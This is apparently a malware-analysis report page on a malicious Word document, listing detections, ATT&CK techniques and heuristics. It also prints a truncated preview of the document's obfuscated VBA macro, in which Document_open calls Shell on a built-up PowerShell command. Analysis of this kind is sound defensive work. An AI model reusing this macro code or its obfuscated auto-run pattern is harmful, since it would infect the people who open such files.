MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains a VBA macro that is automatically executed upon opening the document. This macro utilizes the Shell() function to execute a payload, as indicated by the critical OLE_VBA_SHELL heuristic. The ClamAV detection name 'Doc.Malware.Valyria-6874636-0' further supports its malicious nature. The VBA code appears to be obfuscated, but the intent to execute an external command is clear.
Heuristics 6
-
ClamAV: Doc.Malware.Valyria-6874636-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-6874636-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10298 bytes |
SHA-256: 041cb49e887ad84f2492cfdd1a53127ac36a2aee081ef818f9ea7e0d8c405bdd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WnhUMPbktu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function huQWaidES()
On Error Resume Next
AqNrEU = 10958 + HISku
qdViX = (26648 * Sgn(buWhGP) / 95749 / OvHwCH * FFOZi + ChrW(RGGmFn) / imnMj * CInt(VhjiE))
wbDMLX = QZGlRP
XNsqf = Rnd(rIRZw)
wjrJo = 32268 + AbkTcI
RtimGW = (43905 * Sgn(wMLtP) / 67360 / jOziD * ENXtzp + ChrW(iDaCt) / dHzwMF * CInt(hTnboI))
QzmhYa = QfQHu
wSKLd = Rnd(MJaYQ)
ftlIz = 53836 + wjPmc
sQbqF = (10833 * Sgn(VBaBS) / 77357 / mIACdw * ubFKn + ChrW(kNhHa) / wjoVsJ * CInt(EwzLYd))
AlavF = zCzlKd
FkRQZr = Rnd(MfGsHh)
pnITS = 52299 + qzzmIs
wVlzzM = (83030 * Sgn(Rofszq) / 51458 / MHork * zDZowv + ChrW(Noivho) / MwnvB * CInt(aoPXk))
rcvQhh = GZTkX
JKuzj = Rnd(hcwpWj)
huQWaidES = HOzfXt + VBA.Shell(vnBsN + Chr(DuqCroSPz + vbKeyP + vVztTjhcZs) + "owers" + QomLwriF + jKuBhYc + DoPRzTDjiBz + DhYpTKZc + NNIZaCuJqJP, 1837 - 1837)
vJDzz = 94368 + CFzOT
OYfziY = (57193 * Sgn(GuXoSa) / 39490 / puwsCq * uJtZFF + ChrW(VCWJir) / GVqpK * CInt(mrWVak))
pjOLnB = IzoBc
vuMMvj = Rnd(JVhaK)
dKZVS = 15701 + cRjYIC
KwlQk = (82689 * Sgn(hYMWE) / 26305 / HCaVuh * QEiCMA + ChrW(sYwVf) / ijfSoR * CInt(KidjiK))
HqCmYw = klbzm
JuCkk = Rnd(vlpkz)
End Function
Private Sub Document_open()
On Error Resume Next
qOozO = 2083 + izaWI
QaBopc = (8497 * Sgn(bXViP) / 59887 / fQnLD * cJwMQ + ChrW(tVFYi) / VlwcLl * CInt(DRBYMw))
cwihbC = CkpKN
NiLFF = Rnd(jurDO)
bKuVw = 82105 + tuJCEB
jbBzh = (49013 * Sgn(LSsXjZ) / 42397 / RcCUP * jLMMj + ChrW(NVzdu) / cKVswc * CInt(UqzGku))
zHakl = Edhzl
XLWTC = Rnd(KUnRDb)
huQWaidES
HWqUP = 54100 + wLfZjZ
MHKGD = (22329 * Sgn(VwzfrI) / 93607 / DjMUF * cLSKMS + ChrW(FUIXRL) / pBZWUw * CInt(vKBNT))
uKjEcS = CBiwz
PMmAf = Rnd(WVzPpk)
wPdrHZ = 92870 + YCHqz
jBtJd = (62353 * Sgn(BGSTtn) / 45402 / ivNfc * LDvawz + ChrW(aHdEMz) / KftdJ * CInt(GKOjX))
RjARz = wWHAmv
HwUVc = Rnd(cjwrvq)
End Sub
Attribute VB_Name = "VloMmGSp"
Function QomLwriF()
On Error Resume Next
mBZlT = kTVSkh
AKLmTG = Rnd(pRsSSX)
vvkpLh = (33978 * Sgn(jEpVuO) / 94722 / lZvld * PThwz + ChrW(VsOJoL) / HWkBqD * CInt(FwjPZM))
oNjuW = 90714 + CHZNYV
SBiEVB = "HeLL . (" + " $" + "env:coMSPEC[" + "4,26," + "25]-jOIN" + "'') (" + "-jOiN(" + "'9" + "7V63<"
TjSZlv = IVTsF
QjspwG = Rnd(fQHMji)
bFdoHU = (47014 * Sgn(FEhqc) / 94491 / iVlOGt * honwn + ChrW(fVLpdw) / aXiwN * CInt(fNfkiI))
nqfhi = 68041 + jBXEhz
MqqQjTV = "28r39~11~3" + "9N101{120" + "V101{43V32N50" + "~104N42V39" + "{47~" + "32{3" + "8r49r101~55N"
wCEEp = dEVdLi
VaAidz = Rnd(OYoBJh)
ABihn = (61647 * Sgn(tcnrU) / 53738 / MPNtc * iPWkw + ChrW(suhPO) / jchHbE * CInt(UcUWO))
mkssN = 62394 + JKmoBf
WUQUf = "36s43r33~" + "42G40{12" + "6J97V7<7x2" + "9<50{17N101G1" + "20~101N43<3"
IsHrKt = XMFTd
kNYRp = Rnd(jiKYk)
IiwZEw = (53740 * Sgn(ThhVJJ) / 81189 / wOpNB * rbTOrY + ChrW(YOUiTE) / MMumcK * CInt(LaVAkR))
wkTnHL = 25289 + KlwiE
hIhjV = "2J" + "50x104" + "N42s3" + "9V47N32s3" + "8V4" + "9J101" + "r22s6"
QomLwriF = SBiEVB + MqqQjTV + WUQUf + hIhjV
End Function
Function jKuBhYc()
On Error Resume Next
rJjAzN = HEKXq
NqdQq = Rnd(nWGpF)
duGqF = (9492 * Sgn(ZHtsNi) / 20163 / UiaWZf * AHWIbw + ChrW(wkvVdN) / pwjPW * CInt(jPomS))
CvSMr = 81006 + womUD
zwvMY = "0V54~49~" + "32" + "V40" + "s107V11G32V4" + "9x107" + "V1" + "8V32r39r6{41G44" + "{32s43G49~126s9"
DUOlT = pYXJcA
amVkB = Rnd(hiuzU)
EviPqi = (68455 * Sgn(niaGru) / 33448 / EHmpt * NPIjk + ChrW(ELUjI) / nFOHo * CInt(KVQmn))
djdJJw = 85213 + zWiju
ipqBj = "7r53~47x7r" + "14V4" + "0G1" + "01s120<101~98" + "N45V49G49{53"
fYzaci = vimtS
boYSSB = Rnd(KAriSG)
wCwXwA = (57209 * Sgn(iooYt) / 62513 / iNaVhJ * btHqcG + ChrW(tuiuEz) / KnvwqU * CInt(kJCizR))
tchbN = 88998 + oGLrzT
wtdncVXj = "V127r106" + "x106G50G50G50r" + "107" + "N36N43" + "x36s41r60" + "s49x44r38{54" + "G1" + "07V49x45" + "r32~" + "40x44G4"
hrkEHi = kYiLJX
VMXlj = Rnd(aCQ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.